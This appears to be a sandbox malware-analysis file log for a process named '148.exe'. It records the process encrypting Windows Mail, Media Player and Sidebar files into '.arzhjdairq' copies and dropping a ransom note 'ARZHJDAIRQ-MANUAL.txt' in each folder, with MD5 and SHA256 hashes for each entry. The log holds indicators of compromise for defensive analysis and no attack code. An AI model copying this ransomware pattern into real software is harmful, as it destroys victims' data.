MD5: 71c72f551b9329591348c10750d8134e
SHA256: 4ddf8d411f4dbf45a60470075b7d8081c0302a2446ec05a484e26065542808b7
3332
148.exe
C:\Users\Administrator\AppData\Local\Temp\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Gadgets\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.arzhjdairq
binary
MD5: 3cf3cb6f4d65d6f5f099cb4dd67dc0f5
SHA256: f48e5642b2291a8f0496c7c74410ea0f32154ec2efb99185fddf0ad7a2d54aad
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.arzhjdairq
binary
MD5: d4efb47db4a6299f37e798f8086ed8d8
SHA256: b2a5990871232a1dc39a7ee6e093c3b03c8d550eb60846eb5f4665168f933d0a
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.arzhjdairq
binary
MD5: 7f89c1f6e626c6ebafe9c08b359cc7cd
SHA256: 6b1d46d8a6182df13c3b0349c0d2b3023b2398afed8e797994e605995384c6ac
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.arzhjdairq
binary
MD5: 8a530e6d1dcfd85239025a806f6fa614
SHA256: 75b4f2a26922bf59421c15285a81f25c68681084e8baa76549b95287ef4303ec
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.arzhjdairq
binary
MD5: 6b219ae8f8970f32af0dd74b51b75f1c
SHA256: e6c4ca3ca46d28967a17406fc6c1db9b86dd757992b9e1688724b8212e25f3be
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.arzhjdairq
binary
MD5: 70f2f2ad48db2154b6feb588e9c2c265
SHA256: 54b4c006168f7f9f8b30926b01cb86ca7590ae3cdd47d99b3b350e2c3d8f20b8
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf.arzhjdairq
binary
MD5: 524fc2118eca631a890c9fce29f29df4
SHA256: 5c245f7e14d17cb038c343489f600d0cfb4dbfdbf60cc487230c4b8bcbcf6490
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.arzhjdairq
binary
MD5: 3bb3ee0501efe2c4547e7a01c90687ec
SHA256: b888e94cdcc3120e1bbe3ada9f7b79fff9cd6dda1f7513189443bc5327b33400
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.arzhjdairq
binary
MD5: 99a701cee2345bec012272cf545f2606
SHA256: 8ffc473e97b3aa80944356af39a56d7c7c36ef6d2d50dafd6e723491a1de3423
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.arzhjdairq
binary
MD5: 953d8490b79359bb1e47e54bc31fa96b
SHA256: e67dd80b15e0e35d6445392b95021c061fdac16d7f48228458d23e2497829556
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.arzhjdairq
binary
MD5: b9484032a03a8652d42134f86870d3b2
SHA256: 1c17ab961854f74d4a3a9e1f8e5524d7c625dd4d260c0a8d9aeccb6dc84fc693
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.arzhjdairq
binary
MD5: 0d6ef42ca870b790b08c70b83e67926d
SHA256: 42dd580f2b966348b88b57090c294dbdc519a27912268f5d0e7d58c8b5fad323
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.arzhjdairq
binary
MD5: 41245426c5b98db00187b4576cb5b899
SHA256: 6d97aec04b6409adbabacece52a13e1236a677a6938cc761730ec8fb2749a731
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.arzhjdairq
binary
MD5: 794edeeb8253cce2a48ba7de4258a6db
SHA256: 1eba332781a67dc53a6fc569057cad78eded0b1888e8f736467f2c19283fdd9d
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.arzhjdairq
binary
MD5: 90a76e70c40e78de01ec9a5cf71041d8
SHA256: bdffdac723e84f273582c6f9dd18e82d77795c3e9d77c436c90f095edd40158b
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf.arzhjdairq
binary
MD5: 400339e3f28ed6483dd4465a7678c707
SHA256: 2da9ead175c4853235e2af9e7964cf9669fcb352a16d5d6de082b0d1eec42db3
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.arzhjdairq
binary
MD5: 83850f58d797b1b814476b4dc0504009
SHA256: 18649d405af3da037fa9610f04e19fda2823c355e25ab95a11dac26b6500e66a
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.arzhjdairq
binary
MD5: b299c3b92eaabf5537be719986fc3eb5
SHA256: 83af08f8bc96b618e28c475ae964c0a019c8abcf319879cda636c0ab8c8ee439
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf.arzhjdairq
binary
MD5: 854f76a6266156cd3326c25e35b52779
SHA256: ccc5ebe96b1249a404ae358fd97a0e8452d82aff219988ecd9b087974c1e8df7
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.arzhjdairq
binary
MD5: 26cfe84b56a66401e80f0000aac18513
SHA256: 58072da403d869a620b3cad2dda2fef48cfcd0e9ab32c5c8c67444ca5dacaefa
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.arzhjdairq
binary
MD5: 446f52a7caa3ee628649f0fa3e9b7b85
SHA256: 664e43f1d350a82c3482d8727123e8e04559661cb267bc1ef619de31ef52cefe
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.arzhjdairq
binary
MD5: e57b5ff446c1fc90a343b3edce8a2414
SHA256: 6bd641456ab2f63423d4f795f7127de8e41225e5d2d257211816117113a353b3
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.arzhjdairq
binary
MD5: aa4f20d539ecb68fa736918184b33ffc
SHA256: b4abda115a61f71d01ddad9f5361089eec263482c393abbb4ea1f035dd8e4b66
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.arzhjdairq
binary
MD5: dbe3ee75dc745dde19a3190c23c59188
SHA256: 70edb2ee2a04eae3e104173a3a04f3827aab1fd6698c1ee0c20a5b9c5c8b4e79
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.arzhjdairq
binary
MD5: b1caa556d497068fb60673524f6184e3
SHA256: 8c06f2e5fdf05ed487964d85df58a481d2da07fcf41556ed9e921b1cef221b81
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.arzhjdairq
gpg
MD5: 325433ab66bcb54e7dfd0411fdee09bb
SHA256: 95c0a89eafc7fef49a82ad927cbc670a9033d31b454c3c9e7841ecfa73790379
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.arzhjdairq
binary
MD5: 66b2cd69fcb0a29fe589089880dc980a
SHA256: 0fcc304bf5f0df4e6ee74a3afe81a60f0174834a4b8427cc1c2e92cdc4ace629
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.arzhjdairq
binary
MD5: 983aae75575a60ea62dc639c9849e2da
SHA256: 61f0674bf7a74992c067ada56888614135aace93952d5199cb85741f605c3045
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.arzhjdairq
bs
MD5: 544488660759f28ee5f08a40984f068c
SHA256: c35ae4fda212d415c566799c60e7591bed15c3d96d9e22349174cd3d89a0e956
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.arzhjdairq
binary
MD5: 0feecf6f75efff39959b8f060c0688f2
SHA256: 47827be2c187dfcd18a19ba0fdc78187513a6e9f877f3569f489e9f4b106a368
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf.arzhjdairq
binary
MD5: dbd04bb272978d6797a87c905068f768
SHA256: 52b52abf7c4abde4b2f39cbcf834dbc8ecb4de81ca83f06ea15ffe469c163918
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf.arzhjdairq
binary
MD5: 7a055d71a6edfab13f9cfe70126593ba
SHA256: 961386fa87ed6034a2b539a463a1765ca3f0075b9cd8bd3ec17f1f736a8c272e
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.arzhjdairq
binary
MD5: 167cc8719257a46678167a8e1569fd86
SHA256: c4599b98d3d9d1799323f8ffd32de6618588be82956921005e54d4260dbcfc6d
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf.arzhjdairq
binary
MD5: 824a59179a4bf6d64fd4614dee0e8dfa
SHA256: aa4dc461adaeea7bed0c7edff4950e976f9b4fe29208f213163f4668b1a0abfe
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.arzhjdairq
binary
MD5: 162462901bc7da1ad776c6c6a14c4ec9
SHA256: 1d9df82c9bb3da4cc6fc48960607674d35e91e254b770f9b18d709cd97b8321d
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.arzhjdairq
binary
MD5: 5e8a7e97e7e8f8ef51fcc36d17473369
SHA256: 932ddecd756e6c23784817dfda3eb426541424fb60c02ae6a5f7a2e561b80eb5
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf.arzhjdairq
binary
MD5: 6f64aaf9c0bb664bd97c0fb7768efdc4
SHA256: 6a7938f9309c8384d80bdbcc72d5251017731f0f114c2610825ece065a88cffe
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf.arzhjdairq
binary
MD5: 5de35ed16d4fbb9bf7c8fbe5f0f87aaf
SHA256: 4a63886ff89e58e23e83cfcf02cc6b0931caf1a2ba5154fc123931788cf8cfed
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.arzhjdairq
binary
MD5: 2573fb4c6f4f8936dbe3fccdb12bc752
SHA256: bfffd917ec0805b5e90a3926b57a7e9acc68c2c35c93e3dd6497ac98bf47a4b9
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.arzhjdairq
binary
MD5: 476889c07e990ef252cdacd6ecc440c9
SHA256: f9e80813d291e6930c53c45311684fcfbea12b47a690fb6fcdcf11bea5ff9fcb
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf.arzhjdairq
binary
MD5: e0a3d5f6c13018f0995f38ea80bbfb65
SHA256: 38c9f73d71dbb2aa7a1726f1bbcc92d57595965cfad6096cf4efdd30a49bb7ef
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf.arzhjdairq
binary
MD5: b5eb66e0a35f447fa97be936df86a47e
SHA256: 81512c008e7741e7ddc0fee6e099146c0d606bd814e6311213ffa43d7c7c21a6
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf.arzhjdairq
binary
MD5: b060bcc6aa5757bc8230410284676b1f
SHA256: 62ebd244d96372a1a7b05687ae8b9bb95607ab95c50ccc65434619295a8ff2cf
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.arzhjdairq
binary
MD5: 9f87dc8d3fbae379b77856b3e08ff6cd
SHA256: 46c78b056646b6cdb275a69ca5ad47d3fb2baa430ac8a85ed9e5ee439098e675
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.arzhjdairq
binary
MD5: b392f0e3b057e706d862772357a8f9fc
SHA256: 74583ffb1de3d21fb868a825053f27c775f7cf1e2857e855a825faa4beddef6d
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.arzhjdairq
binary
MD5: a6a36a54a78fd3db051165f1891bbf09
SHA256: 62a6ff2de3ce0de22b75c6106077c88cce4d51154977142d70660f4246db96f1
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf.arzhjdairq
binary
MD5: 89307ad537d343f65337d6ff3843e96e
SHA256: 5f14407e2684adb908e3df5a728172b392b8c7d6a611f29de1a66f91e72319f6
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.arzhjdairq
binary
MD5: a0f4736d585a46433e7bd52a918a64d7
SHA256: f478c3cbc874ad0df570930844c5f84071947c5ac13e306b7f644be45b02835a
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.arzhjdairq
binary
MD5: 01aa4983ff94aad476c0cff535b0c571
SHA256: 77c9d2a116e75b61b987848d5e370e095acc417b5a59f2e2f5cef50be413cdc9
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.arzhjdairq
binary
MD5: e8a946bf93e6d591d0c2e56634d4271c
SHA256: fee77b77fefc94155300fa1eeea7466f8423194f2ad749bbedf87f2919fe709b
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.arzhjdairq
binary
MD5: 1020a037508b0f09c81e024fa1b1819a
SHA256: 454e756ab1e2928a65d572d5fd032b7b4ef699ac5c13ba601d1d7450c53712e8
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.arzhjdairq
binary
MD5: 3a7604874de34136cb47fc27398ab493
SHA256: a59d7ca1585592ce79d2d633c1578be64d2fcb5f383bbdd2386406ba4e00ba66
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml.arzhjdairq
binary
MD5: bbb0ba986090561e1c834fb0f64b8945
SHA256: c9f414b3649af8a8fb76aabacdf96c52456a1e3f1fb58b78d02cb5f655c6c258
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.arzhjdairq
binary
MD5: 8550aae76087927f7879bb6c87ed81d6
SHA256: 377b8e093466b68ed5bbc53047bda8b7ad28c85e6e5bd30f79695c706d2a2c02
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log.arzhjdairq
binary
MD5: e54e1d35713b5f5f0345f8248ce12e18
SHA256: 170f4a69f2d33c27d05f2ea7a39299a96f9373986ea75aec826ff71ff1ff3832
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log.arzhjdairq
binary
MD5: 9bbed594273ce9c2250439e78566aebf
SHA256: 4c238796996df11570c41a67a9924d7912693ae9540a968dce1e47d3663cd7bc
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk.arzhjdairq
binary
MD5: a9296a9799226597696a33898b85b514
SHA256: 276b3ea57cd35cbd87d0ccb1858428decf8d0feb8a1e6f408c58d47fe2452a69
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.arzhjdairq
binary
MD5: a55433e2db7c4bd3411ab630b20fd05d
SHA256: c783203d413f8734b195f94af004b8a7f1c5280db7d2a61cf011fdba6c7ccc03
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.arzhjdairq
binary
MD5: faf6466aa7705c2c9a5df68526418f7c
SHA256: 0f9f291acd6dbfc1bfa361d8cba6f51faf874ad14862bf4e572b76c42d6f2c51
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.arzhjdairq
binary
MD5: 1208a9ca6b5f3394df62f960b15fbd7d
SHA256: d40d1519afbe414a358be55daf30e8f0040716a1dcdd637194d68a11eedbe7ff
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount.arzhjdairq
binary
MD5: 4e2afa15847c81c0a830cf7da4d1b2dc
SHA256: 40a2eddb1b6e7b0e5358f07ab310d158cfba496a6944b03ce4714e80665a7768
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount.arzhjdairq
binary
MD5: d871aa874a503397410f4c427d3ada37
SHA256: 1a24201869f2d3b6a7ce2afb77f0cb768b5a3682ae0f852b0b5590a723720eb4
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount.arzhjdairq
binary
MD5: 6b6484aa265f1bb766885b397f42535e
SHA256: c3ac9bc4c5f6f1d30d6168cf8b53952b014931d6153a82f21ace9aa7d027ec32
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount
––
MD5:  ––
SHA256:  ––
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\ARZHJDAIRQ-MANUAL.txt
text
MD5: 2f41f240b0e994be5f200b1365ba7f1a
SHA256: 8d91c14436dc3a462127531d11e729907b03b5464bda4082ad31e741f0d7fc45
3332
148.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl.arzhjdairq
binary
MD5: a752b1657c25b01c573f62a12efbf570
SHA256: 8c54928a134673164ab304c46602a5010f74f96d41b2bdd519ddd236bb248d85
